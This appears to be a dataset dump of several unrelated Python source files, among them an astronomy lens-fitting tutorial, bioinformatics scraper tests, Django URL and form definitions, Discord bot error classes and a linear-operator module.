content stringlengths 5 1.05M |
|---|
# %%
"""
Tutorial 8: Fitting
===================
In this example, we'll fit the `Imaging` data we simulated in the previous exercise. we'll do this using model images
generated via a `Tracer`, and by comparing to the simulated image we'll get diagnostics about the quality of the fit.
"""
# %%
#%matplotlib inline
from pyprojroot import here
workspace_path = str(here())
#%cd $workspace_path
print(f"Working Directory has been set to `{workspace_path}`")
from os import path
import autolens as al
import autolens.plot as aplt
# %%
"""
we'll need the path to the chapter in this tutorial to load the dataset from your hard-disk.
"""
# %%
"""
The `dataset_path` specifies where the data was output in the last tutorial, which is the directory
`autolens_workspace/dataset/howtolens/chapter_1`.
"""
# %%
dataset_path = path.join("dataset", "howtolens", "chapter_1")
imaging = al.Imaging.from_fits(
image_path=path.join(dataset_path, "image.fits"),
noise_map_path=path.join(dataset_path, "noise_map.fits"),
psf_path=path.join(dataset_path, "psf.fits"),
pixel_scales=0.1,
)
# %%
"""
The `imaging` is an `Imaging` object, which is a package of all components of the dataset, in particular:
1) The image.
2) The Point Spread Function (PSF).
3) Its noise-map.
Which are all stored as `Array` objects.
"""
# %%
print("Image:")
print(imaging.image)
print("Noise-Map:")
print(imaging.noise_map)
print("PSF:")
print(imaging.psf)
# %%
"""
To fit an image, we first specify a `Mask2D`, which describes the sections of the image that we fit.
Typically, we want to mask regions of the image where the lens and source galaxies are not visible, for example at
the edges where the signal is entirely background sky and noise.
For the image we simulated, a 3" circular `Mask2D` will do the job.
A `Mask2D` also takes the `sub_size` parameter we are used to giving a grid. This does what it does for a `Grid` -
defining the (masked) sub-grid used to calculate lensing quantities from a mask.
"""
# %%
mask = al.Mask2D.circular(
shape_2d=imaging.shape_2d, pixel_scales=imaging.pixel_scales, sub_size=1, radius=3.0
)
print(mask) # 1 = True, which means the pixel is masked. Edge pixels are indeed masked.
print(mask[48:53, 48:53]) # Whereas central pixels are `False` and therefore unmasked.
# %%
"""
We can use an `Imaging` `Plotter`.to compare the mask and the image - this is useful if we really want to `tailor` a
mask to the lensed source's light (which in this example, we won't).
"""
# %%
aplt.Imaging.image(imaging=imaging, mask=mask)
# %%
"""
The `mask` automatically `zooms` our plot around the masked region only - meaning that if our image is very large, we
focus-in on the lens and source galaxies.
You'll see this is an option for pretty much every `Plotter` in **PyAutoLens**, and is something we'll do often throughout
the tutorials.
"""
# %%
"""
To fit the data we create a `MaskedImaging` object, which is a `package` of all parts of a data-set we need in order
to fit it with a lens model:
1) The imaging-data, including the image, PSF (so that when we compare a tracer`s image to the image instrument we
can include blurring due to the telescope optics) and noise-map (so our goodness-of-fit measure accounts for
noise in the observations).
2) The mask, so that only the regions of the image with a signal are fitted.
3) A `Grid` aligned to the `Imaging` data's pixels, so the tracer`s image is generated on the same (masked) `Grid`
as the image.
"""
# %%
masked_imaging = al.MaskedImaging(imaging=imaging, mask=mask)
aplt.Imaging.image(imaging=masked_imaging.imaging)
# %%
"""
By printing its attributes, we can see that it does indeed contain the mask, masked image, masked noise-map, psf and so
on.
"""
# %%
print("Mask2D")
print(masked_imaging.mask)
print()
print("Masked Image:")
print(masked_imaging.image)
print()
print("Masked Noise-Map:")
print(masked_imaging.noise_map)
print()
print("PSF:")
print(masked_imaging.psf)
print()
# %%
"""
The masked image and noise-map are again stored in 2D and 1D.
However, the 1D array now corresponds only to the pixels that were not masked, whereas for the 2D array, all edge
values are masked and are therefore zeros.
"""
# %%
print("The 2D Masked Image and 1D Image of unmasked entries")
print(masked_imaging.image.shape_2d)
print(masked_imaging.image.shape_1d)
print(masked_imaging.image.in_2d)
print(masked_imaging.image.in_1d)
print()
print("The 2D Masked Noise-Map and 1D Noise-Map of unmasked entries")
print(masked_imaging.noise_map.shape_2d)
print(masked_imaging.noise_map.shape_1d)
print(masked_imaging.noise_map.in_2d)
print(masked_imaging.noise_map.in_1d)
# %%
"""
The masked data also has a `Grid`, where only coordinates which are not masked are included (the masked 2D values are
set to [0.0. 0.0]).
"""
# %%
print("Masked Grid")
print(masked_imaging.grid.in_2d)
print(masked_imaging.grid.in_1d)
# %%
"""
To fit an image, create an image using a `Tracer`. Lets use the same `Tracer` we simulated the `Imaging` instrument with
(thus, our fit is `perfect`).
Its worth noting that below, we use the `MaskedImaging`'s `Grid` to setup the `Tracer`. This ensures that our
image-plane image is the same resolution and alignment as our lens data's masked image.
"""
# %%
lens_galaxy = al.Galaxy(
redshift=0.5,
mass=al.mp.EllipticalIsothermal(
centre=(0.0, 0.0),
einstein_radius=1.6,
elliptical_comps=al.convert.elliptical_comps_from(axis_ratio=0.7, phi=45.0),
),
)
source_galaxy = al.Galaxy(
redshift=1.0,
bulge=al.lp.EllipticalSersic(
centre=(0.1, 0.1),
elliptical_comps=al.convert.elliptical_comps_from(axis_ratio=0.8, phi=60.0),
intensity=0.3,
effective_radius=1.0,
sersic_index=2.5,
),
)
tracer = al.Tracer.from_galaxies(galaxies=[lens_galaxy, source_galaxy])
aplt.Tracer.image(tracer=tracer, grid=masked_imaging.grid)
# %%
"""
To fit the image, we pass the `MaskedImaging` and `Tracer` to a `FitImaging` object. This performs the following:
1) Blurs the tracer`s image with the lens data's PSF, ensuring the telescope optics are included in the fit. This
creates the fit`s `model_image`.
2) Computes the difference between this model_image and the observed image-data, creating the fit`s `residual_map`.
3) Divides the residual-map by the noise-map, creating the fit`s `normalized_residual_map`.
4) Squares every value in the normalized residual-map, creating the fit`s `chi_squared_map`.
5) Sums up these chi-squared values and converts them to a `log_likelihood`, which quantifies how good the tracer`s
fit to the data was (higher log_likelihood = better fit).
"""
# %%
fit = al.FitImaging(masked_imaging=masked_imaging, tracer=tracer)
aplt.FitImaging.subplot_fit_imaging(fit=fit, include=aplt.Include(mask=True))
# %%
"""
We can print the fit`s attributes. As usual, we can choose whether to return the fits in 2d or 1d, and in 2d if we
don't specify where we'll get all zeros, as the edges were masked:
"""
# %%
print("Model-Image:")
print(fit.model_image.in_2d)
print(fit.model_image.in_1d)
print()
print("Residual Maps:")
print(fit.residual_map.in_2d)
print(fit.residual_map.in_1d)
print()
print("Chi-Squareds Maps:")
print(fit.chi_squared_map.in_2d)
print(fit.chi_squared_map.in_1d)
# %%
"""
Of course, the central unmasked pixels have non-zero values.
"""
# %%
model_image = fit.model_image.in_2d
print(model_image[48:53, 48:53])
print()
residual_map = fit.residual_map.in_2d
print("Residuals Central Pixels:")
print(residual_map[48:53, 48:53])
print()
print("Chi-Squareds Central Pixels:")
chi_squared_map = fit.chi_squared_map.in_2d
print(chi_squared_map[48:53, 48:53])
# %%
"""
The fit also gives a log likelihood, which is a single-figure estimate of how good the model image fitted the simulated
image (in unmasked pixels only!).
"""
# %%
print("Likelihood:")
print(fit.log_likelihood)
# %%
"""
We can customize the `MaskedImaging` we set up, using the `SettingsMaskedImaging` object.
For example, we can:
- Specify the `Grid` used by the `MaskedImaging` to fit the data, where we below increase it from its default value of
2 to 5.
- Bin-up the masked `Imaging` by a factor 2. This decreases the resolution of the data losing us information, but
makes the fit computationally faster (which will be important in the next chapter).
"""
# %%
settings_masked_imaging = al.SettingsMaskedImaging(
grid_class=al.Grid, sub_size=4, bin_up_factor=2
)
masked_imaging_custom = al.MaskedImaging(
imaging=imaging, mask=mask, settings=settings_masked_imaging
)
# %%
"""
If we use this data to perform a fit, we can immediately note how the resolution of the data has been binned up.
"""
# %%
fit_custom = al.FitImaging(masked_imaging=masked_imaging_custom, tracer=tracer)
aplt.FitImaging.subplot_fit_imaging(fit=fit_custom, include=aplt.Include(mask=True))
# %%
"""
The use of `Settings` objects is a core feature of the **PyAutoLens** API and will appear throughout the **HowToLens**
chapters for setting up many different aspects of a **PyAutoLens** fit, so take note!
"""
# %%
"""
We used the same `Tracer` to create and fit the image, giving an excellent fit. The residual-map and chi-squared-map,
show no signs of the source-`Galaxy`'s light present, indicating a good fit. This solution will translate to one of the
highest-log_likelihood solutions possible.
Lets change the `Tracer`, so that it`s near the correct solution, but slightly off. Below, we slightly offset the lens
galaxy, by 0.005"
"""
# %%
lens_galaxy = al.Galaxy(
redshift=0.5,
mass=al.mp.EllipticalIsothermal(
centre=(0.005, 0.005),
einstein_radius=1.6,
elliptical_comps=al.convert.elliptical_comps_from(axis_ratio=0.7, phi=45.0),
),
)
source_galaxy = al.Galaxy(
redshift=1.0,
bulge=al.lp.EllipticalSersic(
centre=(0.1, 0.1),
elliptical_comps=al.convert.elliptical_comps_from(axis_ratio=0.8, phi=60.0),
intensity=0.3,
effective_radius=1.0,
sersic_index=2.5,
),
)
tracer = al.Tracer.from_galaxies(galaxies=[lens_galaxy, source_galaxy])
fit = al.FitImaging(masked_imaging=masked_imaging, tracer=tracer)
aplt.FitImaging.subplot_fit_imaging(fit=fit, include=aplt.Include(mask=True))
# %%
"""
Residuals now appear at the locations of the source galaxy, increasing the chi-squared values (which determine
our log_likelihood).
Lets compare the log likelihood to the value we computed above (which was 4372.90):
"""
# %%
print("Previous Likelihood:")
print(4593.8596)
print("New Likelihood:")
print(fit.log_likelihood)
# %%
"""
It decreases! As expected, this model is a worse fit to the data.
Lets change the `Tracer`, one more time, to a solution nowhere near the correct one.
"""
# %%
lens_galaxy = al.Galaxy(
redshift=0.5,
mass=al.mp.EllipticalIsothermal(
centre=(0.005, 0.005),
einstein_radius=1.5,
elliptical_comps=al.convert.elliptical_comps_from(axis_ratio=0.7, phi=45.0),
),
)
source_galaxy = al.Galaxy(
redshift=1.0,
bulge=al.lp.EllipticalSersic(
centre=(0.2, 0.0),
elliptical_comps=al.convert.elliptical_comps_from(axis_ratio=0.8, phi=60.0),
intensity=0.5,
effective_radius=0.8,
sersic_index=2.5,
),
)
tracer = al.Tracer.from_galaxies(galaxies=[lens_galaxy, source_galaxy])
fit = al.FitImaging(masked_imaging=masked_imaging, tracer=tracer)
aplt.FitImaging.subplot_fit_imaging(fit=fit, include=aplt.Include(mask=True))
# %%
"""
Clearly, the model provides a terrible fit and this `Tracer` is not a plausible representation of the `Imaging` dataset
(of course, we already knew that, given that we simulated it!)
The log likelihood drops dramatically, as expected.
"""
# %%
print("Previous Likelihoods:")
print(4593.8596)
print(4478.4995)
print("New Likelihood:")
print(fit.log_likelihood)
# %%
"""
Congratulations, you`ve fitted your first strong lens with **PyAutoLens**! Perform the following exercises:
1) In this example, we `knew` the correct solution, because we simulated the lens ourselves. In the real Universe,
we have no idea what the correct solution is. How would you go about finding the correct solution? Could you find a
solution that fits the data reasonable through trial and error?
"""
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# (c) University of St Andrews 2022
# (c) University of Strathclyde 2022
# (c) James Hutton Institute 2022
#
# Author:
# Emma E. M. Hobbs
#
# Contact
# eemh1@st-andrews.ac.uk
#
# Emma E. M. Hobbs,
# Biomolecular Sciences Building,
# University of St Andrews,
# North Haugh Campus,
# St Andrews,
# KY16 9ST
# Scotland,
# UK
#
# The MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""Tests cazy module
These test are intened to be run from the root of the repository using:
pytest -v
"""
import json
import pandas as pd
from argparse import Namespace, ArgumentParser
from datetime import datetime
from pathlib import Path
import pytest
from sqlalchemy.exc import IntegrityError
from saintBioutils.utilities import logger as saint_logger
from saintBioutils.utilities import file_io as saint_fileIO
from cazy_webscraper import cazy
@pytest.fixture
def cazy_file_path():
return "tests/test_inputs/test_inputs_cazy/cazy_data.txt"
@pytest.fixture
def cazy_zip_path():
_path = "tests/test_inputs/test_inputs_cazy/cazy_db_timestamp.zip"
return _path
@pytest.fixture
def cazy_data_dict():
_dict = {'UBD70155.1': {'kingdom': {'Bacteria'}, 'organism': {'Bacteroides cellulosilyticus BFG-250'}, 'families': {'GH157': {None}}}, 'ALJ59177.1': {'kingdom': {'Bacteria'}, 'organism': {'Bacteroides cellulosilyticus WH2'}, 'families': {'GH157': {None}}}, 'WP_029429093.1': {'kingdom': {'Bacteria'}, 'organism': {'Bacteroides cellulosilyticus WH2'}, 'families': {'GH157': {None}}}}
return _dict
def test_get_cazy_file(cazy_file_path):
argsdict = {"args": Namespace(
retries=10,
cazy_data=cazy_file_path,
)}
cazy.get_cazy_txt_file_data(
"tests/test_inputs/test_inputs_cazy/",
"time_stamp",
argsdict['args'],
)
def test_parsing_cazy_zip(monkeypatch):
argsdict = {"args": Namespace(
retries=10,
cazy_data=None,
)}
def mock_download(*args, **kwards):
return
monkeypatch.setattr(cazy, "get_cazy_file", mock_download)
cazy.get_cazy_txt_file_data(
Path("tests/test_inputs/test_inputs_cazy/"),
"time_stamp",
argsdict['args'],
)
def test_failed_download(monkeypatch):
argsdict = {"args": Namespace(
retries=2,
cazy_data=None,
)}
def mock_download(*args, **kwards):
return "error"
monkeypatch.setattr(cazy, "get_cazy_file", mock_download)
with pytest.raises(SystemExit) as pytest_wrapped_e:
cazy.get_cazy_txt_file_data(
Path("tests/test_inputs/test_inputs_cazy/"),
"time_stamp",
argsdict['args'],
)
assert pytest_wrapped_e.type == SystemExit
def test_parse_all_cazy_data(cazy_file_path):
with open(cazy_file_path, "r") as fh:
cazy_lines = fh.read().splitlines()
assert cazy.parse_all_cazy_data(cazy_lines, None) == {'UBD70155.1': {'kingdom': {'Bacteria'}, 'organism': {'Bacteroides cellulosilyticus BFG-250'}, 'families': {'GH157': {None}}}, 'ALJ59177.1': {'kingdom': {'Bacteria'}, 'organism': {'Bacteroides cellulosilyticus WH2'}, 'families': {'GH157': {None}}}, 'WP_029429093.1': {'kingdom': {'Bacteria'}, 'organism': {'Bacteroides cellulosilyticus WH2'}, 'families': {'GH157': {None}}}, 'BAX82587.1': {'kingdom': {'Bacteria'}, 'organism': {'Labilibaculum antarcticum SPP2'}, 'families': {'GH157': {None}}}, 'SDR68055.1': {'kingdom': {'Bacteria'}, 'organism': {'Polaribacter sp. KT25b'}, 'families': {'GH157': {None}}}, 'QXP79022.1': {'kingdom': {'Bacteria'}, 'organism': {'Winogradskyella sp. HaHa_3_26'}, 'families': {'GH157': {None}}}, 'QNK77973.1': {'kingdom': {'Bacteria'}, 'organism': {'Winogradskyella sp. PAMC22761'}, 'families': {'GH157': {None}}}, 'BCJ46567.1': {'kingdom': {'Bacteria'}, 'organism': {'Actinoplanes ianthinogenes NBRC 13996'}, 'families': {'AA5': {'AA5_2'}, 'GH1': {None}}}, 'ATO81963.1': {'kingdom': {'Bacteria'}, 'organism': {'Actinoplanes sp. SE50'}, 'families': {'AA5': {'AA5_2'}}}, 'AEV83893.1': {'kingdom': {'Bacteria'}, 'organism': {'Actinoplanes sp. SE50/110'}, 'families': {'AA5': {'AA5_2'}}}, 'SLL99371.1': {'kingdom': {'Bacteria'}, 'organism': {'Actinoplanes sp. SE50/110'}, 'families': {'AA5': {'AA5_2'}}}, 'CRK61066.1': {'kingdom': {'Bacteria'}, 'organism': {'Alloactinosynnema sp. L-07'}, 'families': {'AA5': {'AA5_2'}}}, 'AUZ88908.1': {'kingdom': {'Bacteria'}, 'organism': {'Arthrobacter agilis UMCV2'}, 'families': {'AA5': {'AA5_2'}}}, 'UKA55327.1': {'kingdom': {'Bacteria'}, 'organism': {'Arthrobacter sp. FW305-BF8'}, 'families': {'AA5': {'AA5_2'}}}, 'QMW46863.1': {'kingdom': {'Eukaryota'}, 'organism': {'Aspergillus flavus AF13'}, 'families': {'AA5': {'AA5_2'}}}, 'QMW38907.1': {'kingdom': {'Eukaryota'}, 'organism': {'Aspergillus flavus AF13'}, 'families': {'AA5': {'AA5_2'}}}, 'UCK59454.1': {'kingdom': {'Eukaryota'}, 'organism': {'Aspergillus flavus CA14'}, 'families': {'AA5': {'AA5_2'}}}, 'UDD63818.1': {'kingdom': {'Eukaryota'}, 'organism': {'Aspergillus flavus CA14'}, 'families': {'AA5': {'AA5_2'}}}, 'QRD87005.1': {'kingdom': {'Eukaryota'}, 'organism': {'Aspergillus flavus NRRL 3357'}, 'families': {'AA5': {'AA5_2'}}}, 'QRD91111.1': {'kingdom': {'Eukaryota'}, 'organism': {'Aspergillus flavus NRRL 3357'}, 'families': {'AA5': {'AA5_2'}}}, 'QMW26827.1': {'kingdom': {'Eukaryota'}, 'organism': {'Aspergillus flavus NRRL3357'}, 'families': {'AA5': {'AA5_2'}}}, 'QMW34793.1': {'kingdom': {'Eukaryota'}, 'organism': {'Aspergillus flavus NRRL3357'}, 'families': {'AA5': {'AA5_2'}}}, 'BAE64583.1': {'kingdom': {'Eukaryota'}, 'organism': {'Aspergillus oryzae RIB40'}, 'families': {'AA5': {'AA5_2'}}}, 'BAE56565.1': {'kingdom': {'Eukaryota'}, 'organism': {'Aspergillus oryzae RIB40'}, 'families': {'AA5': {'AA5_2'}}}, 'BCS28434.1': {'kingdom': {'Eukaryota'}, 'organism': {'Aspergillus puulaauensis MK2'}, 'families': {'AA5': {'AA5_2'}}}, 'BCS18659.1': {'kingdom': {'Eukaryota'}, 'organism': {'Aspergillus puulaauensis MK2'}, 'families': {'AA5': {'AA5_2'}}}, 'BAW27603.1': {'kingdom': {'Eukaryota'}, 'organism': {'Aspergillus stellatus NBRC 32302'}, 'families': {'AA5': {'AA5_2'}}}}
def test_parse_cazy_data(cazy_file_path):
with open(cazy_file_path, "r") as fh:
cazy_lines = fh.read().splitlines()
assert cazy.parse_cazy_data_with_filters(
cazy_lines,
{'GH'},
{'Bacteria'},
{'GH157', 'AA5_2'},
{'Bacteroides', 'Aspergillus oryzae', 'Aspergillus flavus NRRL3357'},
None,
) == {'UBD70155.1': {'kingdom': {'Bacteria'}, 'organism': {'Bacteroides cellulosilyticus BFG-250'}, 'families': {'GH157': {None}}}, 'ALJ59177.1': {'kingdom': {'Bacteria'}, 'organism': {'Bacteroides cellulosilyticus WH2'}, 'families': {'GH157': {None}}}, 'WP_029429093.1': {'kingdom': {'Bacteria'}, 'organism': {'Bacteroides cellulosilyticus WH2'}, 'families': {'GH157': {None}}}}
def test_build_tax_dict():
cazy_data = {'UBD70155.1': {'kingdom': {'Bacteria'}, 'organism': {'Bacteroides cellulosilyticus BFG-250'}, 'families': {'GH157': {None}}}, 'ALJ59177.1': {'kingdom': {'Bacteria'}, 'organism': {'Bacteroides cellulosilyticus WH2'}, 'families': {'GH157': {None}}}, 'WP_029429093.1': {'kingdom': {'Bacteria'}, 'organism': {'Bacteroides cellulosilyticus WH2'}, 'families': {'GH157': {None}}}}
assert {
'Bacteria': {
'Bacteroides cellulosilyticus BFG-250', 'Bacteroides cellulosilyticus WH2',
}} == cazy.build_taxa_dict(cazy_data)
def test_apply_filters_no_tax(cazy_data_dict):
assert cazy.apply_kingdom_tax_filters(
cazy_data_dict,
set(),
set(),
'UBD70155.1',
'GH157',
None,
'Bacteroides cellulosilyticus BFG-250',
'Bacteria',
) == ({'UBD70155.1': {'kingdom': {'Bacteria'}, 'organism': {'Bacteroides cellulosilyticus BFG-250'}, 'families': {'GH157': {None}}}, 'ALJ59177.1': {'kingdom': {'Bacteria'}, 'organism': {'Bacteroides cellulosilyticus WH2'}, 'families': {'GH157': {None}}}, 'WP_029429093.1': {'kingdom': {'Bacteria'}, 'organism': {'Bacteroides cellulosilyticus WH2'}, 'families': {'GH157': {None}}}}, True)
def test_apply_tax_filters(cazy_data_dict):
assert cazy.apply_kingdom_tax_filters(
cazy_data_dict,
{'Bacteria'},
{'Bacteroides'},
'UBD70155.1',
'GH157',
None,
'Bacteroides cellulosilyticus BFG-250',
'Bacteria',
) == ({'UBD70155.1': {'kingdom': {'Bacteria'}, 'organism': {'Bacteroides cellulosilyticus BFG-250'}, 'families': {'GH157': {None}}}, 'ALJ59177.1': {'kingdom': {'Bacteria'}, 'organism': {'Bacteroides cellulosilyticus WH2'}, 'families': {'GH157': {None}}}, 'WP_029429093.1': {'kingdom': {'Bacteria'}, 'organism': {'Bacteroides cellulosilyticus WH2'}, 'families': {'GH157': {None}}}}, True)
def test_add_protein_to_dict(cazy_data_dict):
assert cazy.add_protein_to_dict(
cazy_data_dict,
'UBD70155.1',
'GH1',
'GH1_1',
'Bacteroides cellulosilyticus BFG-250',
'Bacteria',
) == {'UBD70155.1': {'kingdom': {'Bacteria'}, 'organism': {'Bacteroides cellulosilyticus BFG-250'}, 'families': {'GH157': {None}, 'GH1': {'GH1_1'}}}, 'ALJ59177.1': {'kingdom': {'Bacteria'}, 'organism': {'Bacteroides cellulosilyticus WH2'}, 'families': {'GH157': {None}}}, 'WP_029429093.1': {'kingdom': {'Bacteria'}, 'organism': {'Bacteroides cellulosilyticus WH2'}, 'families': {'GH157': {None}}}}
def test_add_protein_to_dict_new_protein(cazy_data_dict):
assert cazy.add_protein_to_dict(
cazy_data_dict,
'UBD70155_new.1',
'GH1',
'GH1_1',
'Bacteroides cellulosilyticus BFG-250',
'Bacteria',
) == {'UBD70155.1': {'kingdom': {'Bacteria'}, 'organism': {'Bacteroides cellulosilyticus BFG-250'}, 'families': {'GH157': {None}}}, 'ALJ59177.1': {'kingdom': {'Bacteria'}, 'organism': {'Bacteroides cellulosilyticus WH2'}, 'families': {'GH157': {None}}}, 'WP_029429093.1': {'kingdom': {'Bacteria'}, 'organism': {'Bacteroides cellulosilyticus WH2'}, 'families': {'GH157': {None}}}, 'UBD70155_new.1': {'kingdom': {'Bacteria'}, 'organism': {'Bacteroides cellulosilyticus BFG-250'}, 'families': {'GH1': {'GH1_1'}}}}
|
"""定义blogs的URL模式"""
from django.conf.urls import url
from . import views
urlpatterns = [
#主页
url(r'^$',views.index,name = 'index'),
#显示所有的主题
url(r'^titles/$',views.titles,name = 'titles'),
#显示特定主题的博客
url(r'^titles/(?P<title_id>\d+)/$',views.title,name = 'title'),
#用于添加新主题的网页
url(r'^new_title/$',views.new_title,name = 'new_title'),
#用于添加新回复的页面
url(r'^new_blogpost/(?P<title_id>\d+)/$',views.new_blogpost,name = 'new_blogpost'),
#用于编辑现有的主题页面
url(r'^edit_blogpost/(?P<blogpost_id>\d+)/$',views.edit_blogpost,name = 'edit_blogpost'),
] |
from enum import Enum
class DriverTypes(Enum):
chrome = "CHROME",
firefox = "FIREFOX",
ie = "IE"
|
from django import forms
from ecomApp.models import Checkout,MyRating
class RatingForm(forms.ModelForm):
class Meta:
model = MyRating
fields=('rating',)
class OrderForm(forms.ModelForm):
class Meta:
model = Checkout
fields=('fullname','email','NameOnCard','Address','creditcardnumber','city','cardExpdate','state','zip','cvv')
|
import json
with open('movies.json', 'r', encoding='utf-8') as fin:
data = json.load(fin)
hits = data.get('hits')
for idx, movie in enumerate(hits, 1):
if 'comedy' in movie.get('genres'):
print("{}. {}".format(idx, movie.get('title', 'MISSING')))
data['hits'][0]['title'] = 'The Rundown 2, the revenge!'
with open('movies_edited.json', 'w', encoding='utf-8') as fout:
data = json.dump(data, fout, indent=True)
|
import tensorflow as tf
# Use eager execution to embrace the upcoming tensorflow 2.0.
tf.enable_eager_execution()
x = tf.constant(4.5)
m = tf.multiply(x, x)
print("hello world {}".format(m))
|
from discord.ext import commands
class Info(commands.CommandError):
def __init__(self, message, **kwargs):
super().__init__(message)
self.kwargs = kwargs
class Warning(commands.CommandError):
def __init__(self, message, **kwargs):
super().__init__(message)
self.kwargs = kwargs
class Error(commands.CommandError):
def __init__(self, message, **kwargs):
super().__init__(message)
self.kwargs = kwargs
class LastFMError(commands.CommandError):
def __init__(self, error_code, message):
super().__init__()
self.error_code = error_code
self.message = message
def __str__(self):
return f"LastFM error {self.error_code}"
def display(self):
return f"LastFM error {self.error_code} : {self.message}"
class RendererError(commands.CommandError):
pass
class ServerTooBig(commands.CheckFailure):
def __init__(self, member_count):
super().__init__()
self.member_count = member_count
class Blacklist(commands.CommandError):
pass
class BlacklistedUser(Blacklist):
def __init__(self):
super().__init__()
self.message = "You have been blacklisted from using Miso Bot"
class BlacklistedMember(Blacklist):
def __init__(self):
super().__init__()
self.message = "You have been blacklisted from using commands by the server moderators"
class BlacklistedGuild(Blacklist):
def __init__(self):
super().__init__()
self.message = "This server is blacklisted from using Miso Bot"
class BlacklistedCommand(Blacklist):
def __init__(self):
super().__init__()
self.message = "This command has been disabled by the server moderators"
class BlacklistedChannel(Blacklist):
def __init__(self):
super().__init__()
self.message = "Command usage in this channel has been disabled by the server moderators"
|
"""
The operators specified in this module act like their matrix equivalent,
and attempt to match tbe basic building blocks in NumPy and other numerical
packages.
"""
import numpy as np
from functools import partial
from pyop import LinearOperator, matmat
from scipy.misc import doccer
docdict = {
'shape' :
"""shape : pair
The shape of the LinearOperator (if it were a matrix).""",
## The see also section.
'zeros' : "zeros : Matrix free version of the zeros matrix.",
'ones' : "ones : Matrix free version of the ones matrix.",
'eye' : "eye : Matrix free version of the eye matrix.",
'diag' : "diag : Convert a 1D array to matrix free diagonal matrix.",
'select' : "select : Select certain rows out of a matrix."
}
docfill = doccer.filldoc(docdict)
@docfill
def zeros(shape):
''' PyOp version of zeros array function (only 2D).
Returns a new LinearOperator that emulates a matrix filled with zeros.
Parameters
----------
%(shape)s
Returns
-------
LinearOperator
A functional version of numpy.zeros()
See Also
--------
%(ones)s
%(eye)s
%(diag)s
%(select)s
Examples
--------
>>> from pyop.operators import zeros
>>> from pyop import toMatrix
>>> toMatrix(zeros((2, 1)))
array([[ 0.],
[ 0.]])
>>> s = (2,2)
>>> toMatrix(zeros(s))
array([[ 0., 0.],
[ 0., 0.]])
'''
def zeroInput(x, op_shape):
return np.zeros((op_shape, x.shape[1]))
return LinearOperator(shape,
matmat(partial(zeroInput, op_shape = shape[0])),
matmat(partial(zeroInput, op_shape = shape[1])))
@docfill
def ones(shape):
''' PyOp version of ones array function (only 2D).
Returns a new LinearOperator that emulates a matrix filled with ones.
Parameters
----------
%(shape)s
Returns
-------
LinearOperator
A functional version of numpy.ones()
See Also
--------
%(zeros)s
%(eye)s
%(diag)s
%(select)s
Examples
--------
>>> from pyop.operators import ones
>>> from pyop import toMatrix
>>> toMatrix(ones((2, 1)))
array([[ 1.],
[ 1.]])
>>> s = (2,2)
>>> toMatrix(ones(s))
array([[ 1., 1.],
[ 1., 1.]])
'''
def sumColumns(x, op_shape):
column_sums = np.sum(x, axis = 0)
return np.tile(column_sums, (op_shape, 1))
return LinearOperator(shape,
matmat(partial(sumColumns, op_shape = shape[0])),
matmat(partial(sumColumns, op_shape = shape[1])))
@docfill
def eye(shape):
''' PyOp version of eye array function (only 2D).
Returns a new LinearOperator that emulates the identity matrix.
Parameters
----------
%(shape)s
Returns
-------
LinearOperator
A functional version of numpy.eye()
See Also
--------
%(zeros)s
%(ones)s
%(diag)s
%(select)s
Examples
--------
>>> from pyop.operators import eye
>>> from pyop import toMatrix
>>> toMatrix(eye((2, 1)))
array([[ 1.],
[ 0.]])
>>> s = (2,2)
>>> toMatrix(eye(s))
array([[ 1., 0.],
[ 0., 1.]])
'''
def identity(x, op_shape):
m, n = op_shape
p, q = x.shape
if m > n:
return np.vstack([x, np.zeros((m - p, q))])
elif m <= n:
return x[:m]
return LinearOperator(shape,
matmat(partial(identity, op_shape = shape)),
matmat(partial(identity, op_shape = shape[::-1])))
@docfill
def select(rows, perm):
''' Select only certain rows of a matrix.
This operator selects only certain rows from a matrix. It can be
particularly useful for consesus or sharing optimization problems.
The input perm can be in any order, and duplicates can be made. In this
manner, it is possible to make a permutation matrix by including an
input that includes each row once and only once.
Parameters
----------
rows : integer
The number of total rows to be selected from.
perm : list
A list of the rows to take. This will define the shape of the
resulting LinearOperator.
Returns
-------
LinearOperator
A LinearOperator that performs the selection on np.array inputs.
See Also
--------
%(zeros)s
%(ones)s
%(eye)s
%(diag)s
Examples
--------
>>> from pyop.operators import select
>>> import numpy as np
>>> S = select(4, [0, 1, 3])
>>> S(np.array([1, 2, 3, 4]))
array([1, 2, 4])
>>> S = select(4, [0, 1, 1])
>>> S(np.array([1, 2, 3, 4]))
array([1, 2, 2])
'''
@matmat
def subset(x):
return x[perm]
@matmat
def expand(x):
ret_shape = (rows, x.shape[1])
ret = np.zeros(ret_shape)
np.add.at(ret, perm, x)
return ret
return LinearOperator((len(perm), rows), subset, expand)
@docfill
def diag(v):
''' Create a LinearOperator that emulates a diagonal matrix.
Creates a LinearOperator that scales each row of its input by the
corresponding element of the input vector v. The length of the vector v
defines the shape of the operator (n by n).
Parameters
----------
v : 1-D array
An array by which to scale each of rows of the input.
Returns
-------
LinearOperator
A LinearOperator that scales np.array inputs.
See Also
--------
%(zeros)s
%(ones)s
%(eye)s
%(select)s
Examples
--------
>>> from pyop.operators import diag
>>> from pyop import toMatrix
>>> import numpy as np
>>> toMatrix(diag(np.array([1, 2, 3, 4])))
array([[ 1., 0., 0., 0.],
[ 0., 2., 0., 0.],
[ 0., 0., 3., 0.],
[ 0., 0., 0., 4.]])
'''
@matmat
def forwardAdjoint(x):
return v[:, np.newaxis] * x
return LinearOperator( (len(v), len(v)),
forwardAdjoint, forwardAdjoint)
|
from channels.auth import AuthMiddlewareStack
from channels.routing import ProtocolTypeRouter, URLRouter
from django.urls import path
from jarvis import consumers
